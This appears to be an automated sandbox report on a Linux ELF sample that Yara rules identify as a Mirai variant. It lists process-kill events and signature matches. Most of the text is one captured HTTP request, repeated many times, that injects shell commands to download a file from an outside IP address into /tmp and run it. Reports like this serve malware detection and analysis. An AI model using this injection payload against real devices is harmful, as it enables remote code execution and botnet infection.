Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive

System Summary:

Malicious sample detected (through community Yara rule)

Source: 5243.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY	Matched rule: Detects ELF Mirai variant Author: Florian Roth
Source: 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY	Matched rule: Detects ELF Mirai variant Author: Florian Roth

Sample tries to kill many processes (SIGKILL)

Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2018, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2077, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2078, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2079, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2080, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2083, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2084, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2156, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5251, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5252, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5253, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5254, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5255, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5256, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5274, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5285, result: successful	Jump to behavior

Sample contains only a LOAD segment without any section mappings

Source: LOAD without section mappings

Program segment: 0x8048000

Yara signature match

Source: 9o6Z1wEokT, type: SAMPLE	Matched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
Source: 5243.1.00000000764ea583.000000008517f29e.rw-.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5241.1.00000000764ea583.000000008517f29e.rw-.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5243.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5243.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY	Matched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
Source: 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY	Matched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
Source: Process Memory Space: 9o6Z1wEokT PID: 5241, type: MEMORYSTR	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =

Sample tries to kill a process (SIGKILL)

Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2018, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2077, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2078, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2079, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2080, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2083, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2084, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2156, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5251, result: successful	Jump to behavior
